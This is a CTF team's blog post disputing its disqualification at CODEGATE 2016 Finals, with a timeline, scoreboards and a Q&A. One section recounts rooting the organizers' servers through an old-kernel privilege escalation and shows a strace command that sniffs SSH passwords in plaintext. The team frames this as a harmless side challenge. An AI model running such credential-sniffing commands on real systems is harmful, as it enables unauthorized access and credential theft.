Final Scoreboard as captured by manhluat (l4w)
CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.
The fact has been announced after competition ended and even after they announced the winners. Disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE ignore our emails starting this week, so we are making it public to avoid gossip and speculation.
Also, there is a bit of technical details.
1. PPP 3570 2. LC↯BC 3440 3. 0daysober 2658
30 min before the end of CTF, we hold second place behind PPP. Distance to the first place is couple hundred points: we need any of the two remaining challenges to make it to the top.
T−10min. We submit hulkbox challenge to the gameboard, getting 1st.
1. LC↯BC 3761 2. PPP 3570 3. 0daysober 2658
T−9min. CTF organizers’ team leader starts to demand aggressively to show him the exploit for the challenge. Task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment when the flag has been submitted (3:50 a.m. in UTC+3 timezone), so we propose to show orgs the exploit later once he’s up.
T=. CTF ends, organizers announce the winners. Press begins to interview us.
T+15min. Organizers interrupt the press session, make everyone leave except the teams. It is announced that one of teams was using remote assistance during the competition. A poll is thrown whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”
T+20min. It’s announced that LC↯BC is disqualified. Scoreboard shifts one row up. We ask why did we get disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
1. PPP 3570 2. 0daysober 2658 3. 217 2632
T+30min. Orgas announce the winners: PPP, 0daysober, 217.
T+4days. None of our emails to either CODEGATE or CTF orgas get answered.
- Rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not an inherent knowledge. If it is forbidden and important to the point of taking away team’s result, rules should state it openly.
- The orgas team leader circled at the PPP table, talking Korean in a low voice throughout the entire game. We know that sounds stupid, but that’s at least amusing. Made us even think orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not cooperative to us.
- Last two hours the orgas stared at our displays assertively. Apart from that it’s pretty uncomfortable and breaks the focus when you try to RE, they totally had more than enough time to tell us if they didn’t like anything about us.
- Well, we pwned the infrastructure.
VMs that hosted the services were running this:
Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
which is a quarter-year old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).
We were able to get UID 0 on hackerlife and get free flag (which we didn’t submit until we pwned the challenge) as well as
/etc/shadowas our trophy.
Some time later payload challenge was released, running the exact same kernel, so why not try escalating there too?
OK, this is interesting. codegate user has the exact same hash. Let’s attach
straceto SSH server and wait for password to fly by in plaintext.
root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0'
[pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22
And yeah, it turns out that every game box does have a sudoer codegate account with the exact same password (which is
qkqojrr******lek!). Game over!
After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.
Treat this as a fun piece.
- LC↯BC had 4 people on-site and 2 remote connected via VPN.
- On-site guys played 100% of the CTF time, remote guys joined and left at their leisure: no-one has free 20 hours during a workday.
- LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
- Security specialists who organize a CTF with eight-year history and 55K USD in prizes did:
- use old Linux kernel version with a public exploit available;
- use the same password for a sudo user on the entire infrastructure;
- use passwords to access the servers;
- spend their time on petty tyranny and annoying players.
- Our solutions for all the tasks that we have submitted:
/home/g0est/flag_tlqkf.txtfrom payload vulnbox that we have not submitted:
Q & A
Questions related to rules of the competition:
Screenshot of the rules taken during competition
Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
Q: Did LC↯BC share the solution or key of any challenge while competition?
Q: Did LC↯BC attack operating server for everyone :)?
Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
Q: Was there a rule effective regarding remote team members?
Q: Were there remote players playing for us?
Q: Were we warned before or during the game that remote help can lead to disqualification?
Q: Have we traded any flags with other teams or organizers?
A: Of course not!
Q: Have we compromised CTF infrastructure (server-side) ?
Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
Hope this shares our vision reasonably and ends any rumors and conjectures about what happened to our team in Seoul this year. We’d like to add that CODEGATE organizers were friendly and helpful every year (we’re visiting the event for 6th year in a row), and hope to hear their vision of current situation.
Current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.
Guys, please don’t hide. We’re up to discuss it peacefully.